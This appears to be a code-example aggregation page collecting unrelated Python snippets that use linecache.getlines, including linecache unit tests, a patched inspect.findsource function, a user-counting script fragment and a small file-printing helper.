f = linecache.getlines('t2lines.txt')

lines = [x[1:-1].split('","') for x in f]  # split fields  # 1: total user count

users = set([line[keys['username']] for line in lines])

user_total = len(set(users))
print(lines)
print(users)
assert type(user_total) == int
print("===========")
# 2: the list of every user's name

users = list(users)
assert type(users) == list
Beispiel #57
0
 def test_no_ending_newline(self):
     """A last line lacking a newline still comes back newline-terminated."""
     self.addCleanup(support.unlink, support.TESTFN)
     with open(support.TESTFN, "w") as fp:
         fp.write(SOURCE_3)
     expected = ["\n", "def f():\n", "    return 3\n"]
     self.assertEqual(linecache.getlines(support.TESTFN), expected)
Beispiel #58
0
 def test_lazycache_already_cached(self):
     """lazycache() must report False once the file's lines are cached."""
     linecache.clearcache()
     linecache.getlines(NONEXISTENT_FILENAME, globals())
     self.assertEqual(linecache.lazycache(NONEXISTENT_FILENAME, globals()),
                      False)
     self.assertEqual(len(linecache.cache[NONEXISTENT_FILENAME]), 4)
Beispiel #59
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved.

    FIXED version with which we monkeypatch the stdlib to work around a bug."""

    file = getsourcefile(object) or getfile(object)
    module = getmodule(object, file)
    lines = (linecache.getlines(file, module.__dict__) if module
             else linecache.getlines(file))
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        return lines, 0

    if isclass(object):
        pat = re.compile(r'^(\s*)class\s*' + object.__name__ + r'\b')
        # Prefer the definition with the least indentation — the one most
        # likely not nested inside a function body.
        candidates = []
        for lineno, text in enumerate(lines):
            m = pat.match(text)
            if not m:
                continue
            if text[0] == 'c':          # top-level hit: cannot do better
                return lines, lineno
            candidates.append((m.group(1), lineno))
        if not candidates:
            raise IOError('could not find class definition')
        # Sorts by leading whitespace first, then by line number.
        candidates.sort()
        return lines, candidates[0][1]

    # Reduce methods/functions/tracebacks/frames to a code object.
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        # fperez - fix: sometimes, co_firstlineno can give a number larger than
        # the length of lines, which causes an error.  Safeguard against that.
        lnum = min(object.co_firstlineno, len(lines)) - 1
        # Walk backwards to the def/lambda/decorator line that starts it.
        while lnum > 0 and not pat.match(lines[lnum]):
            lnum -= 1
        return lines, lnum
    raise IOError('could not find code object')
def read_linecache(file):
    """Print the contents of *file* to stdout via the linecache module.

    Best-effort: a missing or unreadable file prints nothing, because
    linecache.getlines() returns an empty list instead of raising.
    """
    # Narrowed from a bare ``except:`` which also swallowed SystemExit and
    # KeyboardInterrupt and hid real bugs; only I/O errors on the print
    # path are still suppressed to keep the original best-effort contract.
    try:
        for line in linecache.getlines(file):
            print(line, end='')
    except OSError:
        pass